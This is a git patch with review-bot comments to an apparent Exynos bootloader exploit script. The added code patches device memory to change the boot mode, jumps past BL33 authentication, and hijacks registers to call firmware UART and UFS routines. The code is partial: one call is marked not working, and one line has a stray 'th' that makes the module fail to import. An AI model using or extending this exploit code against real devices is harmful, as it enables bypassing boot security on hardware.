From a7a5bdeb7e2736207099bcb6498a794d7ed29930 Mon Sep 17 00:00:00 2001
From: Jonathan Herrewijnen
Date: Mon, 25 Nov 2024 17:40:39 +0100
Subject: [PATCH] Can print UART address from functoin

---
 source/exploit/exploit.py | 37 ++++++++++++++++++++++++++++++++++---
 1 file changed, 34 insertions(+), 3 deletions(-)

diff --git a/source/exploit/exploit.py b/source/exploit/exploit.py
index 6cc4095..79809d3 100644
--- a/source/exploit/exploit.py
+++ b/source/exploit/exploit.py
@@ -838,9 +838,11 @@ class ExynosDevice():
             BL33_AUTH = 0x02024e5c
         if args.MIB3:
             self.cd.memwrite_region(0xcf08aa59, b"\x4c\x44\x46\x58") #58 was 57 in INIT print
-            #self.cd.memwrite_region(0xcf05e2b0, struct.pack('>I', 0x20000014)) # Change bootmode to GPT
             self.cd.memwrite_region(0xcf026b94, struct.pack('>I', 0x210000b4)) # Change bootmode to GPT
             BL33_AUTH = 0x202ae18 # BL33_LR
+
+            # Modifying return values to continue boot flow
+            #self.cd.memwrite_region(0xcf05dea8, b"\xa0\x1f\x42\xf8")
 
         self.cd.arch_dbg.state.LR = DEBUGGER_ADDR
         self.cd.restore_stack_and_jump(BL33_AUTH)
@@ -848,11 +850,36 @@ class ExynosDevice():
         time.sleep(1)
         self.usb_read(0x200)
 
+        self.cd.arch_dbg.state.LR = DEBUGGER_ADDR
+
+        self.write_uart(DEBUGGER_ADDR, 0xcf4dfb28)th
+
+        # NOT WORKING
         self.read_ufs(DEBUGGER_ADDR)
         pass
 
 
 
+    def write_uart(self, DEBUGGER_ADDR, data_pointer):
+        self.cd.arch_dbg.state.LR = DEBUGGER_ADDR
+
+        curr_X0 = self.cd.arch_dbg.state.X0
+        curr_X1 = self.cd.arch_dbg.state.X1
+
+        self.cd.arch_dbg.state.X0 = data_pointer
+        self.cd.arch_dbg.state.X1 = 0x0
+
+        self.cd.restore_stack_and_jump(0xcf05dd6c)
+        time.sleep(0.5)
+        self.connect_device()
+        self.usb_read(0x200)
+
+        self.cd.arch_dbg.state.X0 = curr_X0
+        self.cd.arch_dbg.state.X1 = curr_X1
+        return
+
+
+
     def read_ufs(self, DEBUGGER_ADDR):
         """
         Read UFS
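Review bot: The commented-out `memwrite_region` call added under `# Modifying return values to continue boot flow` is dead code with no record of why it is disabled, so a later reader cannot tell whether it is pending, abandoned or known to break the boot. Either drop the line or replace the comment with one that states its status, e.g. `# TODO: disabled — <reason it is not applied>`. The `if args.MIB3:` branch belongs to a method whose start and end lie outside this hunk.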
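Review bot: `self.write_uart(DEBUGGER_ADDR, 0xcf4dfb28)th` has a stray `th` after the closing parenthesis; that is a SyntaxError, so the whole module fails to import and nothing in this commit can run — the line should be `self.write_uart(DEBUGGER_ADDR, 0xcf4dfb28)`. The new `write_uart` method has no docstring; a short one saying that it saves X0/X1, places `data_pointer` in X0 and zero in X1, jumps to the routine, reconnects and drains the USB buffer, then restores X0/X1 would document the visible contract, and the bare `return` at the end is redundant. The X0/X1 restore is not guaranteed: if `connect_device()` or `usb_read()` raises, the registers are left holding the call arguments, so the jump-and-read lines belong in a `try:` whose `finally:` performs the two restores. The calling method (its start is outside this hunk) keeps a `pass` after real statements, which is dead and can be removed.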
@@ -861,9 +888,13 @@ class ExynosDevice():
         param1 = offset
         """
         self.cd.arch_dbg.state.LR = DEBUGGER_ADDR
-        ufs_read_addr = 0xcf013840
-        self.cd.arch_dbg.state.X4 = 0x155A0000
+        ufs_read_addr = 0xcf00eaf4
+        self.cd.arch_dbg.state.X0 = 0x0
+        self.cd.arch_dbg.state.X1 = 0x1
         self.cd.restore_stack_and_jump(ufs_read_addr)
+
+        time.sleep(1)
+        self.connect_device()
         pass
 
 
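Review bot: The docstring line `param1 = offset` directly above the change no longer matches the body, which now hard-codes `X0 = 0x0` and `X1 = 0x1` and accepts no offset from the caller, so the documented contract is stale; update the docstring to describe the registers the new target is actually given, or take an `offset` parameter and pass it through. Unlike `write_uart`, which calls `self.usb_read(0x200)` after `connect_device()`, `read_ufs` reconnects but reads nothing back and returns `None`, so any output of the routine is not captured — if that is deliberate while the caller labels it `# NOT WORKING`, a one-line comment stating the current status would save the next reader a debugging session. The trailing `pass` after real statements is dead and can be dropped. The method signature and the head of its docstring are outside this hunk.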